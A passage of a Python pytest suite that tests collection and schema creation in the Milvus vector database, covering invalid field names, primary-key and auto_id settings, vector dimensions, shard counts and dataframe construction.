fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema = cf.gen_collection_schema(fields, primary_field=int_field_one.name)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema,
exp_primary: int_field_one.name})
new_schema = cf.gen_collection_schema(fields, primary_field=int_field_two.name)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=new_schema, check_task=CheckTasks.err_res,
check_items=error)
assert collection_w.primary_field.name == int_field_one.name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_dim(self):
"""
target: test collection with dup name and new dim schema
method: 1. default schema 2. schema with new dim
expected: raise exception
"""
self._connect()
new_dim = 120
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
schema = cf.gen_default_collection_schema()
new_fields = cf.gen_float_vec_field(dim=new_dim)
schema.fields[-1] = new_fields
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
dim = collection_w.schema.fields[-1].params['dim']
assert dim == ct.default_dim
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_invalid_schema_type(self, get_none_removed_invalid_strings):
"""
target: test collection with dup name and invalid schema
method: 1. default schema 2. invalid schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
schema = get_none_removed_invalid_strings
self.collection_wrap.init_collection(collection_w.name, schema=schema,
check_task=CheckTasks.err_res, check_items=error)
assert collection_w.name == c_name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_same_schema(self):
"""
target: test collection with dup name and same schema
method: dup name and same schema
expected: two collection object is available
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert collection_w.name == self.collection_wrap.name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_none_schema(self):
"""
target: test collection with none schema
method: create collection with none schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Should be passed into the schema"}
self.collection_wrap.init_collection(c_name, schema=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_invalid_type_schema(self, get_none_removed_invalid_strings):
"""
target: test collection with invalid schema
method: create collection with non-CollectionSchema type schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
self.collection_wrap.init_collection(c_name, schema=get_none_removed_invalid_strings,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_invalid_type_fields(self, get_invalid_type_fields):
"""
target: test collection with invalid fields type, non-list
method: create collection schema with non-list invalid fields
expected: exception
"""
self._connect()
fields = get_invalid_type_fields
error = {ct.err_code: 0, ct.err_msg: "The fields of schema must be type list"}
self.collection_schema_wrap.init_collection_schema(fields=fields,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_with_unknown_type(self):
"""
target: test collection with unknown type
method: create with DataType.UNKNOWN
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="unknown", dtype=DataType.UNKNOWN,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not Milvus Exception")
@pytest.mark.parametrize("name", [[], 1, (1,), {1: 1}, "12-s"])
def test_collection_invalid_type_field(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=5, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_field_name(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_none_field_name(self):
"""
target: test field schema with None name
method: None field name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=None, dtype=DataType.INT64, is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "You should specify the name of field"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dtype", [6, [[]], {}, (), "", "a"])
def test_collection_invalid_field_type(self, dtype):
"""
target: test collection with invalid field type
method: invalid DataType
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="test", dtype=dtype, is_primary=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_field_dtype_float_value(self):
"""
target: test collection with float type
method: create field with float type
expected:
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=5.0,
is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 0, ct.err_msg: "Field type must be of DataType!"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_empty_fields(self):
"""
target: test collection with empty fields
method: create collection with fields = []
expected: exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=[], primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_field(self):
"""
target: test collection with dup field name
method: Two FieldSchema have same name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field_one = cf.gen_int64_field(is_primary=True)
field_two = cf.gen_int64_field()
schema = cf.gen_collection_schema(fields=[field_one, field_two, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "duplicated field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
assert not self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("field", [cf.gen_float_vec_field(), cf.gen_binary_vec_field()])
def test_collection_only_vector_field(self, field):
"""
target: test collection just with vec field
method: create with float-vec fields
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe"}
self.collection_schema_wrap.init_collection_schema([field], check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_float_vectors(self):
"""
target: test collection with multi float vectors
method: create collection with two float-vec fields
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_float_vec_field(name="tmp")]
schema = cf.gen_collection_schema(fields=fields, auto_id=True)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_mix_vectors(self):
"""
target: test collection with mix vectors
method: create with float and binary vec
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_binary_vec_field()]
schema = cf.gen_collection_schema(fields=fields, auto_id=True)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_without_vectors(self):
"""
target: test collection without vectors
method: create collection only with int field
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_collection_schema([cf.gen_int64_field(is_primary=True)])
error = {ct.err_code: 0, ct.err_msg: "No vector field is found."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_primary_field(self):
"""
target: test collection without primary field
method: no primary field specified in collection schema and fields
expected: raise exception
"""
self._connect()
int_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64)
vec_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_float_vec_field_name,
dtype=DataType.FLOAT_VECTOR, dim=ct.default_dim)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema([int_fields, vec_fields],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_is_primary_false(self):
"""
target: test collection with all is_primary false
method: set all fields if_primary false
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=False), cf.gen_float_field(is_primary=False),
cf.gen_float_vec_field(is_primary=False)]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("is_primary", ct.get_invalid_strs)
def test_collection_invalid_is_primary(self, is_primary):
"""
target: test collection with invalid primary
method: define field with is_primary=non-bool
expected: raise exception
"""
self._connect()
name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Param is_primary must be bool type"}
self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=is_primary,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("primary_field", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_primary_field(self, primary_field):
"""
target: test collection with invalid primary_field
method: specify invalid string primary_field in collection schema
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("primary_field", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_non_string_primary_field(self, primary_field):
"""
target: test collection with non-string primary_field
method: primary_field type is not string
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_not_existed_primary_field(self):
"""
target: test collection with not exist primary field
method: specify not existed field as primary_field
expected: raise exception
"""
self._connect()
fake_field = cf.gen_unique_str()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=fake_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_schema(self):
"""
target: test collection with primary field
method: specify primary field in CollectionSchema
expected: collection.primary_field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_field(self):
"""
target: test collection with primary field
method: specify primary field in FieldSchema
expected: collection.primary_field
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(), cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
self.collection_wrap.init_collection(cf.gen_unique_str(prefix), schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_unsupported_primary_field(self, get_unsupported_primary_field):
"""
target: test collection with unsupported primary field type
method: specify non-int64 as primary field
expected: raise exception
"""
self._connect()
field = get_unsupported_primary_field
vec_field = cf.gen_float_vec_field(name="vec")
error = {ct.err_code: 1, ct.err_msg: "Primary key type must be DataType.INT64."}
self.collection_schema_wrap.init_collection_schema(fields=[field, vec_field], primary_field=field.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_primary_fields(self):
"""
target: test collection with multi primary
method: collection with two primary fields
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2", is_primary=True)
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one."}
self.collection_schema_wrap.init_collection_schema(
fields=[int_field_one, int_field_two, cf.gen_float_vec_field()],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_inconsistent(self):
"""
target: test collection with different primary field setting
method: 1. set A field is_primary 2. set primary_field is B
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one"}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=int_field_two.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_consistent(self):
"""
target: test collection with both collection schema and field schema
method: 1. set A field is_primary 2.set primary_field is A
expected: verify primary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field(is_primary=True)
schema = cf.gen_collection_schema(fields=[int_field_one, cf.gen_float_vec_field()],
primary_field=int_field_one.name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_field_schema(self, auto_id):
"""
target: test collection with auto_id in field schema
method: specify auto_id True in field schema
expected: verify schema's auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field])
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_collection_schema(self, auto_id):
"""
target: test collection with auto_id in collection schema
method: specify auto_id True in collection schema
expected: verify schema auto_id and collection schema
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_auto_id_non_primary_field(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_false_non_primary(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: verify schema auto_id is False
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name='int2', auto_id=False)
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
assert not schema.auto_id
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_inconsistent(self):
"""
target: test collection auto_id with both collection schema and field schema
method: 1.set primary field auto_id=True in field schema 2.set auto_id=False in collection schema
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "The auto_id of the collection is inconsistent with "
"the auto_id of the primary key field"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_consistent(self, auto_id):
"""
target: test collection auto_id with both collection schema and field schema
method: set auto_id=True/False both field and schema
expected: verify auto_id
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_none_in_field(self):
"""
target: test collection with auto_id is None
method: set auto_id=None
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
is_primary=True,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("auto_id", ct.get_invalid_strs)
def test_collection_invalid_auto_id(self, auto_id):
"""
target: test collection with invalid auto_id
method: define field with auto_id=non-bool
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_fields_auto_id(self):
"""
target: test collection auto_id with multi fields
method: specify auto_id=True for multi int64 fields
expected: todo raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
cf.gen_int64_field(is_primary=True, auto_id=True)
self.field_schema_wrap.init_field_schema(name="int", dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dtype", [DataType.FLOAT_VECTOR, DataType.BINARY_VECTOR])
def test_collection_vector_without_dim(self, dtype):
"""
target: test collection without dimension
method: define vector field without dim
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field, _ = self.field_schema_wrap.init_field_schema(name="vec", dtype=dtype)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "dimension is not defined in field type params"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_vector_invalid_dim(self, get_invalid_dim):
"""
target: test collection with invalid dimension
method: define float-vec field with invalid dimension
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=get_invalid_dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: f'invalid dim: {get_invalid_dim}'}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dim", [-1, 0, 32769])
def test_collection_vector_out_bounds_dim(self, dim):
"""
target: test collection with out of bounds dim
method: invalid dim -1 and 32759
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "invalid dimension: {}. should be in range 1 ~ 32768".format(dim)}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_non_vector_field_dim(self):
"""
target: test collection with dim for non-vector field
method: define int64 field with dim
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
dim=ct.default_dim)
float_vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[int_field, float_vec_field],
primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_desc(self):
"""
target: test collection with description
method: create with description
expected: assert default description
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_none_desc(self):
"""
target: test collection with none description
method: create with none description
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=None)
error = {ct.err_code: 1, ct.err_msg: "None has type NoneType, but expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_long_desc(self):
"""
target: test collection with long desc
method: create with long desc
expected:
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
desc = "a".join("a" for _ in range(256))
schema = cf.gen_default_collection_schema(description=desc)
self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_binary(self):
"""
target: test collection with binary-vec
method: create collection with binary field
expected: assert binary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_binary_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tag(CaseLabel.L0)
def test_collection_shards_num_with_default_value(self):
"""
target:test collection with shards_num
method:create collection with shards_num
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=default_shards_num,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_shards_num: default_shards_num})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tag(CaseLabel.L0)
@pytest.mark.parametrize("shards_num", [-256, 0, 10, 256])
def test_collection_shards_num_with_not_default_value(self, shards_num):
"""
target:test collection with shards_num
method:create collection with not default shards_num
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=shards_num,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_shards_num: shards_num})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tag(CaseLabel.L0)
def test_collection_shards_num_with_error_type(self):
"""
target:test collection with error type shards_num
method:create collection with error type shards_num
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error_type_shards_num = "2" # suppose to be int rather than str
error = {ct.err_code: -1, ct.err_msg: f"expected one of: int, long"}
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=error_type_shards_num,
check_task=CheckTasks.err_res,
check_items=error)
class TestCollectionOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test collection interface operations
******************************************************************
"""
# def teardown_method(self):
# if self.self.collection_wrap is not None and self.self.collection_wrap.collection is not None:
# self.self.collection_wrap.drop()
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_connection(self):
"""
target: test collection without connection
method: 1.create collection after connection removed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.err_res, check_items=error)
assert self.collection_wrap.collection is None
@pytest.mark.tags(CaseLabel.L2)
def test_collection_multi_create_drop(self):
"""
target: test cycle creation and deletion of multiple collections
method: in a loop, collections are created and deleted sequentially
expected: no exception
"""
self._connect()
c_num = 20
for _ in range(c_num):
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert c_name not in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_drop(self):
"""
target: test collection with dup name, and drop
method: 1. two dup name collection object
2. one object drop collection
expected: collection dropped
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert not self.utility_wrap.has_collection(c_name)[0]
error = {ct.err_code: 1, ct.err_msg: f'HasPartition failed: can\'t find collection: {c_name}'}
collection_w.has_partition("p", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_after_drop(self):
"""
target: test create collection after create and drop
method: 1. create a 2. drop a 3, re-create a
expected: no exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
collection_w.drop()
assert not self.utility_wrap.has_collection(collection_w.name)[0]
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_collection_all_datatype_fields(self):
"""
target: test create collection with all dataType fields
method: create collection with all dataType schema
expected: create successfully
"""
self._connect()
fields = []
for k, v in DataType.__members__.items():
if v and v != DataType.UNKNOWN and v != DataType.FLOAT_VECTOR and v != DataType.BINARY_VECTOR:
field, _ = self.field_schema_wrap.init_field_schema(name=k.lower(), dtype=v)
fields.append(field)
fields.append(cf.gen_float_vec_field())
schema, _ = self.collection_schema_wrap.init_collection_schema(fields,
primary_field=ct.default_int64_field_name)
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
class TestCollectionDataframe(TestcaseBase):
"""
******************************************************************
The following cases are used to test construct_from_dataframe
******************************************************************
"""
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_df(self, request):
if request.param is None:
pytest.skip("skip None")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_dataframe(self):
"""
target: test collection with dataframe data
method: create collection and insert with dataframe
expected: collection num entities equal to nb
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([c_name])
